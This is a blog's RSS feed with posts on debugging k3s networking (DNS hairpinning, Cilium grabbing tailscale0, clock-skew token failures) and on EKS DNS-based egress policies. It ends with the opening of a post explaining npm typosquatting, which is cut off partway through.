zerodaywolfhttps://zerodaywolf.sh/Recent content on zerodaywolfen-usThis work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License.Sun, 16 Jan 2022 18:00:35 +0530Fixing NAT Hairpinning in k3s with Tailscalehttps://zerodaywolf.sh/debugs/k8s-hairpin-routing-tailscale/Fri, 29 May 2026 18:00:00 +0530<p>Services in my k3s cluster were painfully slow when accessed over Tailscale. Curling a service took 17s from a tailnet client and 60s from the controlplane.</p> <h2 id="problem">problem</h2> <table> <thead> <tr> <th>Source</th> <th>Time</th> <th>Notes</th> </tr> </thead> <tbody> <tr> <td>tailnet client</td> <td>17s</td> <td>Via Tailscale tunnel</td> </tr> <tr> <td>controlplane</td> <td>60s</td> <td>NAT hairpin: exits and re-enters cluster</td> </tr> </tbody> </table> <p>My setup: k3s cluster with ingress-nginx exposed to the Tailnet via a Tailscale LoadBalancer IP. External-DNS watches Ingress objects and creates A records in PiHole pointing all <code>*.k3s.mydomain.com</code> hostnames to this IP.</p> <h2 id="root-cause">root cause</h2> <p>NAT hairpinning caused by DNS.</p> <p>In-cluster pods use CoreDNS, which forwards external queries to PiHole (the upstream DNS). PiHole returns <code>100.x.x.x</code> - the Tailscale LoadBalancer IP. So even traffic originating inside the cluster exits via Tailscale, traverses the tunnel, and re-enters the cluster to hit ingress-nginx.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">broken path (NAT hairpin): </span></span><span class="line"><span class="cl"> pod → 100.x.x.x → tailscale tunnel → back into cluster → ingress-nginx → backend </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">correct path: </span></span><span class="line"><span class="cl"> pod → ingress-nginx ClusterIP → backend </span></span></code></pre></div><p>The controlplane was worst at 60s because it had to NAT hairpin through its own Tailscale interface.</p> <h2 id="solution">solution</h2> <p>Split-horizon DNS using CoreDNS&rsquo;s <code>rewrite</code> plugin.</p> <p>k3s supports a <code>coredns-custom</code> ConfigMap in <code>kube-system</code>. Files with <code>.override</code> extension get injected into the main <code>.:53</code> server block. I added a rewrite rule that intercepts <code>*.k3s.mydomain.com</code> queries and resolves them to the ingress-nginx ClusterIP directly - before they ever reach PiHole.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">v1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">ConfigMap</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">coredns-custom</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">kube-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">data</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">custom-zone.override</span><span class="p">:</span><span class="w"> </span><span class="p">|</span><span class="sd"> </span></span></span><span class="line"><span class="cl"><span class="sd"> rewrite stop { </span></span></span><span class="line"><span class="cl"><span class="sd"> name regex (.+)\.k3s\.mydomain\.com ingress-nginx-controller.ingress-nginx.svc.cluster.local </span></span></span><span class="line"><span class="cl"><span class="sd"> answer name ingress-nginx-controller\.ingress-nginx\.svc\.cluster\.local (.+)\.k3s\.mydomain\.com </span></span></span><span class="line"><span class="cl"><span class="sd"> }</span><span class="w"> </span></span></span></code></pre></div><h3 id="how-it-works">how it works</h3> <ol> <li>Pod queries <code>app.k3s.mydomain.com</code></li> <li>The <code>rewrite</code> plugin rewrites the query to <code>ingress-nginx-controller.ingress-nginx.svc.cluster.local</code></li> <li>The <code>kubernetes</code> plugin (already in the <code>.:53</code> block) resolves it to the current ClusterIP</li> <li>The <code>answer name</code> directive rewrites the response back so the client sees <code>app.k3s.mydomain.com</code></li> <li>The HTTP <code>Host</code> header is still <code>app.k3s.mydomain.com</code>, so ingress-nginx routes correctly</li> </ol> <p>No hardcoded IPs. If the ingress-nginx ClusterIP changes, the kubernetes plugin picks it up automatically.</p> <h3 id="why-override-and-not-server">why <code>.override</code> and not <code>.server</code></h3> <p>Files with <code>.server</code> extension create a separate CoreDNS server block. That block doesn&rsquo;t have the <code>kubernetes</code> plugin, so you&rsquo;d need to either hardcode the ClusterIP (fragile) or <code>forward</code> queries back to kube-dns (extra hop). <code>.override</code> injects into the existing block that already has the <code>kubernetes</code> plugin loaded.</p> <h3 id="why-not-the-template-plugin">why not the <code>template</code> plugin</h3> <p>The <code>template</code> plugin can synthesize DNS responses, but it requires a literal IP address in the config. If the ingress-nginx Service is ever recreated, the ClusterIP changes and the config breaks. The <code>rewrite</code> approach resolves dynamically.</p> <h2 id="verification">verification</h2> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># in-cluster: should return ingress-nginx ClusterIP, not 100.x.x.x</span> </span></span><span class="line"><span class="cl">kubectl run dnstest --rm -it --image<span class="o">=</span>busybox --restart<span class="o">=</span>Never -- nslookup app.k3s.mydomain.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># tailnet client: should still return 100.x.x.x</span> </span></span><span class="line"><span class="cl">dig app.k3s.mydomain.com </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># latency from controlplane</span> </span></span><span class="line"><span class="cl">curl -o /dev/null -w <span class="s2">&#34;%{time_total}\n&#34;</span> -sk https://app.k3s.mydomain.com/ </span></span></code></pre></div><p>Latency from the controlplane dropped from 60s to 0.003s. The worker node, which doesn&rsquo;t have Tailscale, was already at 0.04s since it couldn&rsquo;t resolve the external hostname and was never affected.</p> <p>The tailnet client is still at 17s. The CoreDNS rewrite only fixes in-cluster resolution; external clients still go through the Tailscale tunnel. That turned out to be a second, unrelated problem (see below).</p> <h2 id="the-tailnet-client-cilium-eating-tailscale0">the tailnet client: cilium eating tailscale0</h2> <p>Fixing the hairpin left the tailnet client untouched at 17s. I initially guessed DERP relay overhead, but that was wrong. Turns out it was my CNI.</p> <p>Cilium, when its <code>devices</code> option is unset, auto-detects <em>every</em> network interface and attaches its eBPF datapath to it. The agent logs at startup told the whole story:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kubectl -n kube-system logs ds/cilium -c cilium-agent <span class="p">|</span> grep <span class="s2">&#34;Devices changed&#34;</span> </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">msg=&#34;Devices changed&#34; devices=&#34;[ens18 tailscale0]&#34; </span></span><span class="line"><span class="cl">msg=&#34;Setting IPv4&#34; device=tailscale0 gso_max_size=65536 gro_max_size=65536 </span></span></code></pre></div><p>Two things jumped out. Cilium had grabbed <strong><code>tailscale0</code></strong> alongside the physical NIC <code>ens18</code>, and was applying <strong>BIG TCP</strong> to it: <code>gso/gro=65536</code>, i.e. 64 KB segmentation/receive offload. The Tailscale tunnel has a 1280-byte MTU. Pushing 64 KB offload onto a 1280-MTU interface causes segmentation and PMTU stalls, which explains the multi-second drag.</p> <p>One thing worth knowing: <code>kubectl logs ds/cilium</code> only returns logs from a single pod of the DaemonSet. To check every node I looped over them:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">for</span> p in <span class="k">$(</span>kubectl -n kube-system get pods -l k8s-app<span class="o">=</span>cilium -o name<span class="k">)</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$p</span><span class="s2">&#34;</span><span class="p">;</span> kubectl -n kube-system logs <span class="nv">$p</span> -c cilium-agent <span class="p">|</span> grep <span class="s2">&#34;Devices changed&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span></code></pre></div><p>Only the node running Tailscale had <code>[ens18 tailscale0]</code>; the others just showed <code>[ens18]</code>. The symptom tracked the Tailscale-hosting node exactly.</p> <h3 id="solution-1">solution</h3> <p>Pin Cilium&rsquo;s datapath to the physical NIC so it never touches <code>tailscale0</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="c"># cilium helm values</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">devices</span><span class="p">:</span><span class="w"> </span><span class="l">ens18</span><span class="w"> </span></span></span></code></pre></div><p>Got the interface name straight from the same logs (<code>device=ens18</code> in the node-address and direct-routing lines), so no shell access needed. Pod traffic still goes through eBPF; only <code>tailscale0</code> host traffic is left on the native kernel stack. This matches <a href="https://tailscale.com/kb/1236/kubernetes-operator#cilium-in-kube-proxy-replacement-mode">Tailscale&rsquo;s documented Cilium guidance</a> and <a href="https://github.com/tailscale/tailscale/issues/12393">tailscale/tailscale#12393</a>.</p> <h3 id="the-gotcha-that-cost-me-a-round-trip">the gotcha that cost me a round-trip</h3> <p>Setting <code>devices</code> updates the <code>cilium-config</code> ConfigMap, but <strong>the running agents don&rsquo;t auto-reload it</strong>; they read it once at startup. My first attempt looked like nothing changed because the agents had restarted ~2 minutes <em>before</em> the new config synced. The fix was correct, the agents needed to be reloaded post-fix. Comparing pod start time against ConfigMap update time made it obvious:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kubectl -n kube-system get cm cilium-config -o <span class="nv">jsonpath</span><span class="o">=</span><span class="s1">&#39;{.metadata.managedFields[*].time}&#39;</span> <span class="c1"># config landed at 18:05</span> </span></span><span class="line"><span class="cl">kubectl -n kube-system get pods -l k8s-app<span class="o">=</span>cilium -o custom-columns<span class="o">=</span><span class="s1">&#39;POD:.metadata.name,START:.status.startTime&#39;</span> <span class="c1"># pods started 18:02</span> </span></span></code></pre></div><p>A <code>kubectl rollout restart ds/cilium</code> (briefly disruptive since it&rsquo;s the CNI) made it stick. After that, every node reported <code>devices=[ens18]</code> and BIG TCP was only applied to <code>ens18</code>.</p> <h3 id="result">result</h3> <table> <thead> <tr> <th>Source</th> <th>Before</th> <th>After</th> </tr> </thead> <tbody> <tr> <td>tailnet client (3.2 MB asset)</td> <td>17s</td> <td>0.31s</td> </tr> <tr> <td>cilium devices</td> <td><code>[ens18 tailscale0]</code></td> <td><code>[ens18]</code></td> </tr> </tbody> </table> <p>~55x improvement, finally in line with in-cluster speeds. Two separate bugs (DNS hairpinning and Cilium grabbing the tunnel interface) wearing the same &ldquo;slow over Tailscale&rdquo; costume.</p> <h2 id="rollback">rollback</h2> <p>CoreDNS auto-reloads when the ConfigMap changes, so rollback is instant:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kubectl delete cm coredns-custom -n kube-system </span></span></code></pre></div>Cilium Node Taints After k3s Restart Caused by Clock Skewhttps://zerodaywolf.sh/debugs/k8s-cilium-taint-clock-skew/Fri, 29 May 2026 12:00:00 +0530<p>After restarting k3s, all nodes got stuck with <code>node.cilium.io/agent-not-ready:NoSchedule</code> taints. Cilium agents were in CrashLoopBackOff, the operator couldn&rsquo;t remove taints, and nothing would schedule.</p> <h2 id="problem">problem</h2> <p>After a k3s server restart, Cilium agents crashed with <code>Unauthorized</code> when contacting the API server. The API server logs showed:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">&#34;Unable to authenticate the request&#34; </span></span><span class="line"><span class="cl"> err=&#34;[invalid bearer token, service account token is not valid yet]&#34; </span></span></code></pre></div><p>&ldquo;not valid yet&rdquo; - the tokens were correctly signed, but timestamped in the future.</p> <h2 id="root-cause">root cause</h2> <p>The Proxmox host&rsquo;s hardware clock (RTC) had been reset during PSU repairs. It was storing local time (UTC+05:30) while the system was configured to read the RTC as UTC. This created a 5h30m offset on every boot.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">16:30 IST system boots, reads RTC value &#34;11:00&#34; as UTC, thinks it&#39;s 16:30 IST </span></span><span class="line"><span class="cl">16:30 IST k3s starts, issues service account tokens timestamped at 16:30 IST </span></span><span class="line"><span class="cl">11:01 IST NTP syncs, clock jumps backward 5h30m to 11:01 IST </span></span><span class="line"><span class="cl">11:01 IST API server rejects all tokens: &#34;not valid yet&#34; (they say 16:30) </span></span></code></pre></div><p>Every pod started before the NTP correction held a future-dated token. Not just Cilium - CoreDNS, metrics-server, and the Cilium operator were all affected.</p> <h3 id="why-it-got-stuck">why it got stuck</h3> <p>Cilium agents have a 60-second timeout for the initial API server connection. After 60s of rejections, the agent crashes. Kubernetes applies exponential backoff (up to 5 min). Each restart reuses the same pod with the same bad token. Self-recovery takes hours.</p> <p>The Cilium operator (not agents) is responsible for removing node taints. The operator also held a bad token, so even after agents recovered, taints stayed:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">&#34;Failed to patch node while removing taint&#34; error=Unauthorized </span></span></code></pre></div><h2 id="solution">solution</h2> <h3 id="immediate-fix">immediate fix</h3> <p>Delete all pods holding bad tokens to force fresh ones:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">kubectl delete pod -n kube-system -l k8s-app<span class="o">=</span>cilium </span></span><span class="line"><span class="cl">kubectl delete pod -n kube-system -l <span class="nv">name</span><span class="o">=</span>cilium-operator </span></span><span class="line"><span class="cl">kubectl delete pod -n kube-system -l k8s-app<span class="o">=</span>kube-dns </span></span></code></pre></div><p>New pods came up within 30 seconds with correctly-timestamped tokens.</p> <h3 id="permanent-fix">permanent fix</h3> <p>Manually set the correct UTC time in the Proxmox host&rsquo;s BIOS/UEFI. The hardware clock holds the value across reboots. Don&rsquo;t bother with <code>timedatectl</code>.</p> <p><code>timedatectl set-time</code> didn&rsquo;t work even on the host. With chrony running, systemd rejects manual time changes, so you&rsquo;d need to <code>timedatectl set-ntp false</code> first. But even then, it would only fix the running system clock. On the next reboot the host reads the RTC again before NTP corrects anything, and NTP was broken anyway: Tailscale overwrites <code>/etc/resolv.conf</code>, so chrony couldn&rsquo;t resolve any NTP server hostnames. The BIOS change was the right fix, after which I fixed the Tailscale DNS with <code>--accept-dns=false</code>.</p> <h2 id="debugging-trail">debugging trail</h2> <ol> <li><strong>Set <code>k8sServiceHost</code> to bypass ClusterIP</strong> - didn&rsquo;t help. Cilium connected to the API server directly but still got <code>Unauthorized</code>. Not a routing problem.</li> <li><strong>Checked RBAC</strong> - service accounts, ClusterRoleBindings all intact. <code>kubectl</code> worked fine from the node.</li> <li><strong>Deleted a stuck pod</strong> - fresh pod came up healthy in 22 seconds. Proved the problem was specific to pods that existed during the restart.</li> <li><strong>Agents healthy but taints persisted</strong> - discovered the operator (not agents) manages taint removal, and it also held a bad token.</li> <li><strong>Disproved signing key rotation theory</strong> - both <code>service.key</code> and <code>service.current.key</code> had identical md5 hashes. k3s does NOT rotate keys on restart.</li> <li><strong>Found &ldquo;not valid yet&rdquo; in API server logs</strong> - time-based rejection, not signature-based.</li> <li><strong>Found the clock jump</strong> - <code>journalctl --boot -u systemd-timesyncd</code> showed a 5h30m backward jump when NTP synced. 5h30m is exactly UTC+05:30 (IST). The RTC had been storing local time (IST) while the system was reading it as UTC, so every boot added 5h30m to the system clock until NTP corrected it.</li> </ol>DNS-Based Egress Control in EKS Using Application Network Policieshttps://zerodaywolf.sh/blog/aws-eks-apn/Tue, 16 Dec 2025 01:40:58 +0530<p>AWS <a href="https://aws.amazon.com/blogs/containers/enhance-amazon-eks-network-security-posture-with-dns-and-admin-network-policies/">recently upgraded</a> its EKS network policies to include <strong>Admin Policies</strong> and <strong>Application Network Policies</strong>. If you work with EKS, your reaction was probably something like: <em>FINALLY</em>.</p> <p>In this post, we’ll focus on Application Network Policies.</p> <h1 id="what-does-it-do">what does it do?</h1> <p>Application Network Policies (APN) let you restrict pod egress based on domain names. In simple terms: you explicitly whitelist the domains your pods can talk to, and everything else is blocked.</p> <p>If you&rsquo;ve used Calico or Cilium then you probably know what I&rsquo;m talking about. The reason as to <em>why</em> I&rsquo;m talking about it is that lots of companies go with the default EKS VPC CNI for their production workloads and up until now there was no straightforward way to restrict egress traffic based on domain names. You were limited to the standard L3/L4 network policies. The latest update changes that.</p> <h1 id="prerequisites">prerequisites</h1> <p>Before you start creating APNs and wonder why nothing works (which happened to me), make sure you have the following:</p> <ul> <li>An EKS cluster with Auto Mode enabled</li> <li>kubectl configured with your cluster</li> </ul> <h3 id="enable-the-network-policy-controller">Enable the Network Policy Controller</h3> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">v1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">ConfigMap</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">amazon-vpc-cni</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">kube-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">data</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">enable-network-policy-controller</span><span class="p">:</span><span class="w"> </span><span class="s2">&#34;true&#34;</span><span class="w"> </span></span></span></code></pre></div><p>Save the above YAML as <code>np-controller.yaml</code> and apply it with <code>kubectl</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">kubectl apply -f np-controller.yaml </span></span></code></pre></div><h3 id="enable-network-policies-in-the-node-class">Enable Network Policies in the Node Class</h3> <p>Update your Node Class configuration to enable network policies.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">eks.amazonaws.com/v1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">NodeClass</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">network-policy-enabled</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="c"># Enables network policy support</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">networkPolicy</span><span class="p">:</span><span class="w"> </span><span class="l">DefaultAllow</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="c"># Optional: Enables logging for network policy events</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">networkPolicyEventLogs</span><span class="p">:</span><span class="w"> </span><span class="l">Enabled</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="c"># Include other Node Class configurations as needed</span><span class="w"> </span></span></span></code></pre></div><p>Save the YAML as <code>my-nodeclass.yaml</code> and apply it:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">kubectl apply -f my-nodeclass.yaml </span></span></code></pre></div><p>Make sure your <code>NodePool</code> config references your <code>NodeClass</code>.</p> <h1 id="applying-the-network-policies">applying the Network Policies</h1> <p>You apply an <code>ApplicationNetworkPolicy</code> with the domains (FQDNs) you want your pods to be able to talk to, and everything else is blocked, including DNS.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">networking.k8s.aws/v1alpha1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">ApplicationNetworkPolicy</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">nginx-egress</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">default</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">podSelector</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">matchLabels</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l">nginx</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">policyTypes</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="l">Egress</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">egress</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">to</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">domainNames</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="s2">&#34;github.com&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="s2">&#34;api.github.com&#34;</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">ports</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">protocol</span><span class="p">:</span><span class="w"> </span><span class="l">TCP</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">port</span><span class="p">:</span><span class="w"> </span><span class="m">443</span><span class="w"> </span></span></span></code></pre></div><p><em>Note: DNS based policies are supported only in <strong>EKS Auto Mode</strong> clusters.</em></p> <p>It&rsquo;s ideal to allow DNS at the cluster level with the new Admin Policies, but for the sake of simplicity here&rsquo;s a namespace-level policy that allows DNS:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-yaml" data-lang="yaml"><span class="line"><span class="cl"><span class="nt">apiVersion</span><span class="p">:</span><span class="w"> </span><span class="l">networking.k8s.io/v1</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">kind</span><span class="p">:</span><span class="w"> </span><span class="l">NetworkPolicy</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">metadata</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l">allow-dns</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">namespace</span><span class="p">:</span><span class="w"> </span><span class="l">default</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"></span><span class="nt">spec</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">podSelector</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">matchLabels</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">run</span><span class="p">:</span><span class="w"> </span><span class="l">nginx</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">policyTypes</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="l">Egress</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">egress</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">to</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">namespaceSelector</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">matchLabels</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">kubernetes.io/metadata.name</span><span class="p">:</span><span class="w"> </span><span class="l">kube-system</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">ports</span><span class="p">:</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">protocol</span><span class="p">:</span><span class="w"> </span><span class="l">UDP</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">port</span><span class="p">:</span><span class="w"> </span><span class="m">53</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span>- <span class="nt">protocol</span><span class="p">:</span><span class="w"> </span><span class="l">TCP</span><span class="w"> </span></span></span><span class="line"><span class="cl"><span class="w"> </span><span class="nt">port</span><span class="p">:</span><span class="w"> </span><span class="m">53</span><span class="w"> </span></span></span></code></pre></div><p>You can apply both by running the <code>kubectl apply</code> command.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">kubectl apply -f allow-github.yaml </span></span><span class="line"><span class="cl">kubectl apply -f allow-dns.yaml </span></span></code></pre></div><p>&hellip;and that&rsquo;s it. Your pods can&rsquo;t reach anything other than <code>github.com</code> and <code>api.github.com</code>.</p> <h1 id="behind-the-scenes">behind the scenes</h1> <p>If you&rsquo;re interested in what happens under the hood, AWS has explained it beautifully in <a href="https://docs.aws.amazon.com/eks/latest/userguide/auto-net-pol.html">this article</a>. I&rsquo;ll explain it quickly over here:</p> <ol> <li>The DNS policy is applied</li> <li>The Network Policy Controller detects the policy and tells the AWS node agent to allow DNS requests only for the allowed domains (<code>github.com</code>)</li> <li>The pod (or an app running in the pod) asks for the IP of <code>npmjs.com</code> and <code>github.com</code></li> <li>These requests are sent through a proxy</li> <li>The request for <code>npmjs.com</code> gets blocked</li> <li>The request for <code>github.com</code> is allowed</li> <li>The DNS request for <code>github.com</code> passes through the DNS filter allowlist and is proxied through CoreDNS</li> <li>CoreDNS recursively resolves the IP from a DNS server</li> <li>The IP and its TTL are returned in the DNS response. They are then stored in an eBPF map (key-value store).</li> <li>eBPF probes (programs) attached to the pod’s network interface enforce egress filtering at the IP layer.</li> <li>IP validity is tied to the DNS TTL and automatically expires</li> </ol> <h1 id="why-this-matters">why this matters</h1> <p>If a pod is compromised:</p> <ul> <li>It can’t call home</li> <li>It can’t download malware</li> <li>It can’t exfiltrate secrets</li> </ul> <p>Even rogue dependencies are restricted to explicitly allowed domains.</p> <p>This is a huge step forward for supply-chain and workload security on EKS.</p> <h1 id="my-youtube-channel">my Youtube channel!</h1> <p>That&rsquo;s right! I created a youtube channel and posted my first short video on this :) Feel free to go and <a href="https://www.youtube.com/shorts/xLMUXKXoeLA">check it out</a>!</p>Hacking the World with NPM Lifecycle Hookshttps://zerodaywolf.sh/blog/npm-lifecycle-hooks/Sun, 07 Sep 2025 01:40:58 +0530<p>Few developers realize how much control a package author has after you hit enter. Let&rsquo;s look at a quick scenario:</p> <ul> <li>Luke is a developer who likes to try out open source libraries</li> <li>He comes across an article that tells him to install <code>react</code> using npm</li> <li>Luke (like me) prefers typing to copy-pasting.. a sometimes not-so-useful habit he will soon regret</li> <li>in a hurry to install <code>react</code> and build cool projects, he opens up his terminal and types in the command:</li> </ul> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">npm install reeact </span></span></code></pre></div><ul> <li><code>npm</code> pulls the package from the public npm registry and sets it up in his environment</li> <li>Luke goes on to use react and build projects</li> <li>Hours later, he notices his entire <code>/home/luke</code> directory has been encrypted except for a ransom note file</li> </ul> <p>The above example may sound very simple, <em>yet</em> it is one of the most common supply chain attacks employed by adversaries.</p> <p>So, what actually happened? It&rsquo;s simple, Luke installed a malicious dependency which ran arbitrary code once it was downloaded. A single extra “e” was all it took. This is what&rsquo;s called a <strong>typosquatting</strong> attack and it&rsquo;s <strong>incredibly</strong> effective.</p> <p>You might have heard of &ldquo;domain squatting&rdquo; where a threat actor registers domains which are just typos of popular domains, like faecbook.com or gamil.com, and hosts malware on top of them. It&rsquo;s the same, but for open source packages! The reason this is so widespread is because <a href="https://www.sciencealert.com/word-jumble-meme-first-last-letters-cambridge-typoglycaemia">our brain does not read every letter by itself, but the word as a whole</a>, so it is naturally a very enticing vector for attackers.</p> <h2 id="npm-install-lifecycle">npm-install lifecycle</h2> <p>When <code>npm install &lt;package&gt;</code> is run, there&rsquo;s a whole lifecycle that it goes through to pull the package and set it up in your environment as a dependency. Here&rsquo;s what happens in a nutshell:</p> <ol> <li>npm queries the registry for the package with the 